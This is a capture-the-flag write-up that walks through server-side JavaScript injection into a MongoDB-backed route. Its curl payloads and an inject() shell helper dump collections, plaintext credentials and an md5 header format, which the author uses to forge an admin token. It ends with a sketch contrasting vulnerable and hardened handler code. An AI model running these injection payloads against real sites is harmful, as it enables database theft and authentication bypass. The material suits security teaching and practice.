The web page states that the author is going to learn JS & SQL. So let's focus
on the JS:
```  
$(document).ready(function() {
    $("img").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/image/" + i, function(i) {
            t.attr("src", i)
        })
    }), $("p").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/text/" + i, function(i) {
            t.html(i)
        })
    });
    var j = '/admin_area';
    $("h2").each(function() {
        var t = $(this),
            i = t.attr("id");
        $.get("/get/title/" + i, function(i) {
            t.html(i)
        })
    })
});
```  
There are 3 types of XHR:
* /get/image/[id]
* /get/text/[id]
* /get/title/[id]

and one URL:
* /admin_area

First, try to exploit the 3 XHR endpoints:  
> $ curl "http://206.189.54.119:5000/get/image/'"  
>  
> Not Found  
>  
> $ curl "http://206.189.54.119:5000/get/text/'"  
>  
> Not Found.  
>  
> $ curl "http://206.189.54.119:5000/get/title/'"  
>  
> Not Found.

Not exploitable? Take a closer look:  
> $ curl -v "http://206.189.54.119:5000/get/image/'"  
>  
> < Application-Error: exception: SyntaxError: Unexpected token ILLEGAL  
>  
> Not Found

Try something else:  
> $ curl -v "http://206.189.54.119:5000/get/image/xxx"  
>  
> < Application-Error: exception: ReferenceError: xxx is not defined near
> 'x});return res;'  
>  
> Not Found

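See the code? The error leaks part of the server-side source. Try closing it
(`%2F%2F` is `//`, to comment out the rest; the space and slashes are escaped
as `%20`/`%2F` so the URL still matches the route):  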
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;%2F%2F"  
>  
> < Application-Error: exception: SyntaxError: Unexpected end of input  
>  
> Not Found

Something missing? Maybe the end of a block/function?  
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;}%2F%2F"  
>  
> /images/sd4x_378x225.jpg

OK, it worked! Now inject something to return:  
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{1:1};}%2F%2F"  
>  
> < Application-Error: Couln't find "picture_path" property in returning
> object from database.  
>  
> Not Found

Change the key:  
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':'hello'};}%2F%2F"  
>  
> hello

Injection succeeded! Now we have the injection point:  
```  
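# Evaluate the expression in $1 server-side and return it as JSON
# through the picture_path property.
inject()
{
    curl -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':tojson($1)}}%2F%2F"
}
inject 'this'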
```

and got this piece of the output:  
```  
...  
this._db = db;  
...  
"_mongo" : connection to EMBEDDED,  
"db" : personal_site,  
...  
```

The site uses MongoDB, and we have access to `db`.  
```  
inject 'db.getCollectionNames()'  
```  
> [  
> "authentication",  
> "contents",  
> "credentials",  
> "images",  
> "system.indexes",  
> "titles"  
> ]  
```  
inject 'db.authentication.find({}).toArray()'  
inject 'db.credentials.find({}).toArray()'  
```  
```  
[  
{  
"_id" : ObjectId("5ae63ae0a86f623c83fecfb3"),  
"id" : 1,  
"method" : "post_data",  
"format" : "username=[username]&password=[password]",  
"activate" : "false"  
},  
{  
"_id" : ObjectId("5ae63ae0a86f623c83fecfb4"),  
"id" : 2,  
"method" : "header",  
"format" : "md5(se3cr3t|[username]|[password])",  
"activate" : "true"  
},  
{  
"_id" : ObjectId("5ae66f87dbf0b5383518fc3d"),  
"id" : 50,  
"activate" : false  
}  
][  
{  
"_id" : ObjectId("5ae63ae0a86f623c83fecfb1"),  
"id" : 1,  
"username" : "administrator",  
"password" : "H4rdP@ssw0rd?"  
},  
{  
"_id" : ObjectId("5ae63ae0a86f623c83fecfb2"),  
"id" : 2,  
"username" : "user",  
"password" : "epass"  
}  
]  
```

Now that we have the authentication method and credentials, we can try accessing
/admin_area:  
> $ curl "http://206.189.54.119:5000/admin_area"  
>  
> authorization_token not found

From the output above, the only activated authentication method is via header,
with the format "md5(se3cr3t|[username]|[password])":  
> curl "http://206.189.54.119:5000/admin_area" -H "authorization_token: 2cc348195dc1ab9842f9446b41ef650b"  
>  
> ASIS{3c266f6ccdaaef52eb4a9ab3abc2ca70}
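
The root cause of the injection above is a route parameter concatenated into server-side JavaScript, together with an error header that echoes the exception. The sketch below is an added example, not code from the challenge: the handler names, the in-memory `db` stand-in and the reconstructed template (guessed from the leaked fragment `x});return res;`) are assumptions, shown beside a hardened form.

```javascript
// Constructed stand-in for the "images" collection; the document is made up.
const db = {
  images: {
    docs: [{ id: 1, picture_path: "/images/sample.jpg" }],
    findOne(q) { return this.docs.find((d) => d.id === q.id) || null; },
  },
};

// Hypothetical vulnerable handler: the route parameter is concatenated into
// JavaScript source that runs with `db` in scope, and the exception text is
// echoed back in an Application-Error header.
function getImageVulnerable(rawId) {
  const fnSrc = "function(db){var res = db.images.findOne({id: " + rawId + "});return res;}";
  try {
    const res = new Function("db", "var f = " + fnSrc + "\nreturn f(db);")(db);
    if (!res || !("picture_path" in res)) throw new Error("no picture_path");
    return { status: 200, headers: {}, body: String(res.picture_path) };
  } catch (e) {
    return { status: 404, headers: { "Application-Error": "exception: " + e }, body: "Not Found" };
  }
}

// Hardened handler: the parameter is parsed as data (strict integer) and
// passed as a query value, never as code; errors stay out of the response.
function getImageHardened(rawId) {
  const notFound = { status: 404, headers: {}, body: "Not Found" };
  if (!/^[0-9]{1,9}$/.test(rawId)) return notFound;
  try {
    const res = db.images.findOne({ id: Number(rawId) });
    return res && typeof res.picture_path === "string"
      ? { status: 200, headers: {}, body: res.picture_path }
      : notFound;
  } catch (e) {
    return notFound; // log e server-side instead of returning it
  }
}

// The 'hello' request shown on the page, URL-decoded.
const payload = "1});return{'picture_path':'hello'};}//";

for (const id of ["1", "xxx", payload]) {
  console.log(JSON.stringify(id), getImageVulnerable(id), getImageHardened(id));
}
```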